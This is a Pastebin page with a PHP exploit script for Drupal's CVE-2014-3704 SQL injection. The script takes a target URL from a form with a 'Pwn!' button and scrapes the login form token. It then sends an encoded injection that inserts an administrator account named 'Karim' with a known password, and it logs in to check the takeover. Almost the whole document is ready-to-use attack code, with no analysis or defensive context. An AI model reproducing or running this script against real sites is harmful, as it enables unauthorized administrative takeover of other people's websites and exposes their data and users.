CrashBandicot

Drupal HTTP Parameter key SQL (CVE-2014-3704)

Dec 8th, 2014
26,803
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.56 KB | None | 0 0
  1. <center><img src='http://im57.gulfup.com/kmhIUR.png' height="150" width="150"></img><br><br>
  2. <font face='courier' color=red size='+1'>
  3. CVE-2014-3704 <br>by CrashBandicot<br>Don't Change Right Noob</font><br><br>
  4. <form method="POST"><strong></strong><input type="text" name="sub" value="http://localhost" ><input type="submit" name="send" value="Pwn!"></form><br></center>
  5.  
  6. <?php
  7. // don't change right noob
  8. if($_POST) {
  9.  
  10.  $tar = $_POST['sub'];
  11.  
  12.  $get = @file_get_contents("$tar/?q=user/login");
  13.  
  14. if(preg_match_all("#name=\"form_build_id\" value=\"(.*?)\" />#i",$get,$name)) {  
  15.  
  16. $tokens = $name[1];
  17.  
  18. foreach($tokens as $token){
  19.  
  20. }
  21.  
  22. $test = "name=Karim&pass=dKMNrGsieC&form_build_id=$token&form_id=user_login&op=Log%20in";
  23. $payload = "name%5b0%20%3binsert%20into%20users%20%28uid%2c%20name%2c%20pass%2c%20mail%2c%20status%29%20select%20max%28uid%29%2b1%2c%20%27Karim%27%2c%20%27%24P\%248bxHyxnrtHg9WpndBMckxyzi.uGQfu/%27%2c%20%27test%40test.com%27%2c%201%20from%20users%3b%20insert%20into%20users_roles%20%28uid%2c%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3d%27Karim%27%29%2c%20%28select%20rid%20from%20role%20where%20name%20%3d%20%27administrator%27%29%29%3b%20%23%20%5d=zcxmnTgToc&name%5b0%5d=ibWmQQZOCK&pass=dVCeuMFNMV&form_build_id=$token&form_id=user_login&op=Log%20in";
  24.  
  25. $ch = curl_init ($tar."/?q=user/login");
  26. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  27. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  28. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  29. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  30. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  31. curl_setopt ($ch, CURLOPT_POST, 1);
  32. curl_setopt ($ch, CURLOPT_POSTFIELDS, $payload);
  33. $data = curl_exec ($ch);
  34. curl_close($ch);
  35.  
  36. echo "<center> Payload Sent !</center>";
  37. echo "<br> <center>Create NeW Account Admin <br></center>";
  38.  
  39. $ch1 = curl_init ($tar."/?q=user/login");
  40. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  42. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  43. curl_setopt ($ch1, CURLOPT_POST, 1);
  44. curl_setopt ($ch1, CURLOPT_POSTFIELDS, $test);
  45. $data1 = curl_exec ($ch1);
  46. curl_close($ch1);
  47.  
  48. if(eregi("/user/1",$data1) || eregi("/admin/",$data1) || eregi("/user/karim",$data1) || eregi("/users/karim",$data1))
  49.     {
  50.         echo "<br> <center>SuccessFull <br>Account : Karim:dKMNrGsieC<br></center>";
  51. } else { echo "<br><center> Exploit Fail<br></center>"; }
  52. } else { echo "<br><center>Exploit Fail<br> </center>"; }
  53. }
  54. ?>
Advertisement
Add Comment
Please, Sign In to add comment